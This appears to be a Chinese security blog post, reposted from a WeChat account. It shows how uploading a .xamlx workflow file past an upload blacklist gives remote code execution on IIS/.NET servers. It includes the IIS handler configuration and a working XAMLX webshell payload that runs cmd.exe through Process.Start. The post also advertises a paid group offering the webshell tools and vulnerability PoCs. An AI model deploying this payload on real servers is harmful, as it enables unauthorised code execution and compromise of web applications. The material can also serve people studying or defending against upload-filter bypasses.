黑名单上传.xamlx文件实现RCE

admin 2024年4月14日01:10:25评论13 views字数 1665阅读5分33秒阅读模式

0x01 xamlx介绍

XAMLX 文件是一种特殊的文件类型,主要用于定义 Windows Workflow Services工作流服务中的工作流程,面是一个简单的xamlx文件结构

<WorkflowService ConfigurationName="Service1" Name="Service1"xmlns="http://schemas.microsoft.com/netfx/2009/xaml/servicemodel" ><TransactedReceiveScope><SendReply.Request>    <Receive OperationName="SubmitPurchasingProposal" Action="testme" /></SendReply.Request></TransactedReceiveScope></WorkflowService>

通过<WorkflowService>定义文件的根元素,其中包含了一些命名空间的声明和配置信息。<SendReply.Request>和<Receive>用于工作流服务中的双向操作,使用请求和应答的模式,其中Action表示接受来自HTTP请求头SOAPAction定义的方法,这里是testme

0x02 运行配置

通过web.config添加配置HTTP请求.xamlx时对应的执行模块

<add name="xamlx-Classic" path="*.xamlx" verb="*" modules="IsapiModule" scriptProcessor="%windir%Microsoft.NETFramework64v4.0.30319aspnet_isapi.dll" requireAccess="Script" preCondition="classicMode,runtimeVersionv4.0,bitness64" />

在IIS里打开 http://localhost:56601/upload.xamlx 显示如下图所示,表示运行环境配置成功

黑名单上传.xamlx文件实现RCE

0x03 编码实战

!!插播一下!!

获取更多.NET相关的技术、工具可以考虑进一下星球,限时争取到了优惠券,马上失效了,名额不多,可以进来看看,物超所值!!最后一天时间!!!

黑名单上传.xamlx文件实现RCE

创建 XAMLX 文件来启动本地计算器,该文件使用XAML格式,内部使用<SendMessageContent>标签允许执行.NET代码。

<p:Sequence DisplayName="Sequential Service">    <TransactedReceiveScope Request="{x:Reference __r0}">      <p1:Sequence >        <SendReply DisplayName="SendResponse" >          <SendReply.Request>            <Receive x:Name="__r0" CanCreateInstance="True" OperationName="SubmitPurchasingProposal" Action="testme" />          </SendReply.Request>          <SendMessageContent>            <p1:InArgument x:TypeArguments="x:String">[System.Diagnostics.Process.Start("cmd.exe", "/c calc").toString()]            </p1:InArgument>          </SendMessageContent>        </SendReply>      </p1:Sequence>    </TransactedReceiveScope>  </p:Sequence>

黑名单上传.xamlx文件实现RCE

工具和xaml webshell已打包,感兴趣的师傅可下载自行研究测试。

欢迎加入星球

黑名单上传.xamlx文件实现RCE

黑名单上传.xamlx文件实现RCE

仅限于工具分享,还有一些高频率的漏洞poc

黑名单上传.xamlx文件实现RCE

涵盖了27个专栏,需要啥就找啥,准没错

黑名单上传.xamlx文件实现RCE

限时福利,名额有限!最后一天时间辣!!!!

黑名单上传.xamlx文件实现RCE

原文始发于微信公众号(哈拉少安全小队):黑名单上传.xamlx文件实现RCE

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月14日01:10:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   黑名单上传.xamlx文件实现RCEhttps://cn-sec.com/archives/2655547.html

发表评论

匿名网友 填写信息